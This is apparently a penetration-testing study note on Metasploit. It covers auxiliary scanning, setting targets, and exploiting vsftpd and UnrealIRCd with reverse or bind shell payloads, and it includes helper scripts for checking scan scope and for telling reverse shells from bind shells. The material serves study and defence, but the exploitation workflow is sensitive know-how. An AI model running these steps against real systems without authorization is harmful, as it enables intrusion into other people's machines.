## What is Metasploit?
- Exploit Module - Includes payload
- Auxiliary Module - Non-exploit modules
## Starting up Metasploit
```
# initialize metasploit's database by running
sudo msfdb init
# access Metasploit
msfconsole
# check database status
db_status
# use workspace to organize your msfconsole
workspace -a <workspace name> # -a to add workspace
workspace <workspace name> # change workspace
# use these commands to view found services and host
services
# search for services such as 'ssh' within the services
services -S <service type>
hosts
# run Nmap in msfconsole by using
db_nmap <nmap command>
```
**Example: Running Nmap within Msfconsole**
![[metasploit_nmap_example.png]]
## Auxiliary Modules
Used for scanning, testing vulnerabilities and gathering information.
For example, this scan does not provide detailed information on the version of Samba being run on the computer.
![[metasploit_aux_searchsamba.png]]
Search for the module to enumerate / investigate further
```
# in msfconsole run
search type:<moduletype: auxiliary OR exploit> <keywords>
```
![[metasploit_aux_searchsmb.png]]
```
# see more information about the module
info <# '1,2,3 etc.' of the module in search result>
```
![[metasploit_aux_info.png]]
```
# to use the module, run
use <# '1,2,3 etc.' of the module>
```
![[metasploit_aux_use.png]]
```
# run options to see what information is required for the module to run
options
# tell msfconsole the target IP (rhosts)
set rhosts <IP>
# if the option is 'rhosts' the module accepts multiple target IP addresses (if it is just 'rhost', it is a single-target module); one or more targets can be set with
set rhosts <IP>,<IP>,<IP> # multiple individual IPs
set rhosts <IP>-<IP> # IP range
set rhosts <IP/CIDR> # CIDR block
set rhosts file:/path/to/iplist # file with a list of IPs
# set a global value with 'setg' so it is reused across other modules; 'setg' works for other fields too
setg rhosts <IP>
# use 'run' or 'exploit' to start
run
```
**The 'rhosts' field is required but empty, so the user must supply the target IP**
![[metasploit_aux_options.png]]
**Running the module**
![[metasploit_aux_run.png]]
**After the run, 'services' is updated with the new findings**
![[metasploit_aux_updatedservices.png]]
```
# to exit the module and return to the msfconsole prompt
back
# to end the entire session, type 'quit' to close msfconsole
quit
```
**Best practice: record these findings in CherryTree**
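The RHOSTS forms listed in the options block above (comma list, start-end range, CIDR, file:) each expand to a different number of targets, and it is easy to scan more than intended. The helper below is an added example, not Metasploit's own code: it expands an RHOSTS string the same way so the scope can be checked before `run` is typed. The `demo()` inputs and the temporary target file are constructed; counting every address in a CIDR block (including network and broadcast) is an assumption of this helper, not a statement about how Metasploit does it.

```python
"""Expand a Metasploit-style RHOSTS value into individual IPv4 addresses.

Added example, not Metasploit's own code. Handles the four RHOSTS forms from
the notes: "a.b.c.d,e.f.g.h", "a.b.c.d-e.f.g.h", "a.b.c.d/24", "file:/path".
"""
import ipaddress
import os
import tempfile


def expand_rhosts(spec: str) -> list[str]:
    """Return every IPv4 address covered by an RHOSTS specification.

    Forms handled:
      single address          10.0.0.5
      comma-separated list    10.0.0.5,10.0.0.9
      inclusive range         10.0.0.5-10.0.0.9
      CIDR block              10.0.0.0/24  (every address in the block, an assumption here)
      file                    file:/path/to/iplist (one entry per line, any form, '#' comments)
    """
    hosts: list[str] = []
    for token in spec.split(","):
        token = token.strip()
        if not token:
            continue
        if token.startswith("file:"):
            path = token[len("file:"):]
            with open(path, encoding="utf-8") as fh:
                for line in fh:
                    line = line.strip()
                    if line and not line.startswith("#"):
                        hosts.extend(expand_rhosts(line))  # each line may use any form
        elif "/" in token:
            # strict=False lets a host-with-prefix such as 10.0.0.5/24 stand for its block
            network = ipaddress.ip_network(token, strict=False)
            hosts.extend(str(addr) for addr in network)
        elif "-" in token:
            start_s, end_s = token.split("-", 1)
            start = ipaddress.ip_address(start_s.strip())
            end = ipaddress.ip_address(end_s.strip())
            if end < start:
                raise ValueError(f"range end before start: {token}")
            hosts.extend(str(ipaddress.ip_address(n)) for n in range(int(start), int(end) + 1))
        else:
            hosts.append(str(ipaddress.ip_address(token)))  # raises on a malformed address
    return hosts


def demo() -> dict[str, int]:
    """Constructed inputs: returns the target count each RHOSTS form expands to."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("# constructed target list\n10.0.0.1\n10.0.0.2-10.0.0.4\n")
        path = fh.name
    try:
        return {
            "list": len(expand_rhosts("192.168.1.10,192.168.1.20,192.168.1.30")),
            "range": len(expand_rhosts("192.168.1.1-192.168.1.10")),
            "cidr": len(expand_rhosts("192.168.1.0/28")),
            "file": len(expand_rhosts("file:" + path)),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for form, count in demo().items():
        print(f"{form}: {count} target(s)")
```

Run it before a scan to see the target count per form; a `/16` that should have been a `/24` shows up as 65,536 targets instead of 256.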
## Exploit Modules
```
# search type:<module type> <keywords>, one type per filter
search type:exploit vsftpd
search type:auxiliary vsftpd
# or just
search vsftpd
# use <# of search result> to select the module
use 0
# show the options
options
# use info to see more information
info
```
![[metasploit_exploit_options.png]]
Exploits always need a payload to run
![[metasploit_exploit_setrhost.png]]
**Running the exploit**
![[metasploit_exploit_bindshell_run.png]]
```
# put the session into the background, minimizing it and returning to msfconsole
background
# see a list of running sessions
sessions
# help menu
sessions -h
# interact with the specified session ID, bringing it back from the background
sessions -i <number>
```
![[metasploit_exploit_sessions.png]]
```
# to end the session, kill a specified ID connection
sessions -k <number>
```
For defenders: use the firewall to close the port the shell is using and cut off the intruder.
## Setting up Exploit & Payload
Example: exploiting UnrealIRCd
```
# search for the correct module in msfconsole
search type:exploit unrealirc
# select the module
use <id> # select the module using its result number: 1,2,3 etc.
# set rhost (target machine) and, for a reverse shell [target connects to attacker], lhost (attacker machine)
set rhost <target IP>
set lhost <attacker IP>
# look through the payloads and set one; start with generic payloads and try reverse shell payloads before bind shell payloads
show payloads
set payload <id>
# run the exploit with the chosen payload
run
# to end msfconsole
exit
```
![[metasploit_exploit_reverseshell_run.png]]
Identify whether an exploit used a reverse or bind shell from the ports involved:
- The side that initiated the connection uses a random high-range port to connect
- e.g. 54214 connecting to the attacker machine's 4444 (reverse shell)
- or the attacker machine's 4444 connecting to 37259 (bind shell)
![[metasploit_exploit_identify_shell.png]]
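The port rule above also works from the defender's side: on the compromised host, a connection record shows which end used a random high port (the initiator) and which end sat on the fixed listener port. The script below is an added example, not part of the notes or of Metasploit, that applies that rule to constructed `ss -tn`-style lines. The listener port 4444, the host addresses, the peer port 41822 and the 32768 ephemeral-range floor (Linux default) are assumptions for the sample.

```python
"""Classify a TCP connection seen on a compromised host as reverse or bind shell.

Added example, not from the notes or Metasploit. Rule applied: the initiating
side shows a random high port, the listening side shows the fixed listener port.
"""
from dataclasses import dataclass

# Linux default ephemeral range starts at 32768 (assumption; Windows uses 49152+).
EPHEMERAL_MIN = 32768


@dataclass(frozen=True)
class Connection:
    """One established TCP connection as seen from the compromised host."""
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int


def classify_shell(conn: Connection, listener_port: int = 4444) -> str:
    """Label a connection 'reverse', 'bind' or 'unknown'.

    reverse: the host initiated, local high port -> remote listener (e.g. 54214 -> 4444)
    bind:    the peer initiated, remote high port -> listener on this host
    """
    local_ephemeral = conn.local_port >= EPHEMERAL_MIN
    remote_ephemeral = conn.remote_port >= EPHEMERAL_MIN
    if conn.remote_port == listener_port and local_ephemeral:
        return "reverse"
    if conn.local_port == listener_port and remote_ephemeral:
        return "bind"
    return "unknown"


def parse_ss_line(line: str) -> Connection:
    """Parse one 'ss -tn' style line: State Recv-Q Send-Q Local:Port Peer:Port."""
    fields = line.split()
    local_ip, local_port = fields[3].rsplit(":", 1)
    remote_ip, remote_port = fields[4].rsplit(":", 1)
    return Connection(local_ip, int(local_port), remote_ip, int(remote_port))


# Constructed sample in 'ss -tn' layout, as seen on the host 10.0.0.20:
#   line 1: host dialed out from 54214 to 10.0.0.5:4444   (reverse shell)
#   line 2: peer dialed in from 41822 to the host's 4444   (bind shell)
#   line 3: an ordinary inbound SSH session for contrast
SAMPLE_SS = """\
ESTAB 0 0 10.0.0.20:54214 10.0.0.5:4444
ESTAB 0 0 10.0.0.20:4444 10.0.0.5:41822
ESTAB 0 0 10.0.0.20:22 10.0.0.99:51002
"""


def classify_sample(text: str = SAMPLE_SS) -> list[tuple[str, str]]:
    """Return (peer address, label) for each connection line in the sample."""
    results = []
    for line in text.splitlines():
        if not line.strip():
            continue
        conn = parse_ss_line(line)
        results.append((f"{conn.remote_ip}:{conn.remote_port}", classify_shell(conn)))
    return results


if __name__ == "__main__":
    for peer, label in classify_sample():
        print(f"{peer:>18}  {label}")
```

A bind-shell hit means a listener was opened on the host itself, so the firewall rule mentioned above belongs on that host's inbound port; a reverse-shell hit points at an outbound connection to block instead.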
## Meterpreter
[[Meterpreter]]
footnote:
The OSCP exam allows Metasploit on only one of the five machines, so red teamers need to learn to exploit manually.
References
[[https://pentesthacker.wordpress.com/2020/12/30/exploiting-postgresql-with-metasploit/]]
#pentest #metasploit